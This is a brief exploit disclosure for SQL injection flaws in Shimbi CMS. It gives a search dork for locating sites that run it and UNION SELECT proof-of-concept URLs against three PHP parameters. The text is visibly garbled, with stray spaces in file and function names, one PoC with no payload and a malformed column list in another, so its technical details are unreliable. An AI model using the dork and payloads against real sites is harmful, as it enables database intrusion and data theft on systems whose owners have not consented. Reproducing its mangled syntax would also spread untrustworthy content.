Shimbi CMS Vulnerable to Multiple SQL Injections
Vendor: http://www.shimbi.in/
Found by: p0pc0rn
Dork: intext: "Powered By Shimbi CMS"
SQL Injection in details. php parameter
---------------------------------------
Http://www.bkjia.com/details.php? Id = [SQL]
POC
---
Http://www.bkjia.com/details.php? Id = 112 union select 1, 2, 4, version (), 6, 7, 8
SQL Injection in faq_details.php parameter
---------------------------------------
Http://www.bkjia.com/faq_details.php? Flag = q & id = [SQL]
POC
---
Http://www.bkjia.com/faq_details.php? Flag = q & id = 1
SQL Injection in blog/addComment. php parameter
---------------------------------------
Http://www.bkjia.com/blog/addComment.php? Topic_id = [SQL]
POC
---
Http://www.bkjia.com/blog/addComment.php? Stat = stat & type = t & category_id = 9 & topic_id =-122/**/UNION/**/SELECT/**/, version (), 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16 --
Thanks,
-P0pc0rn-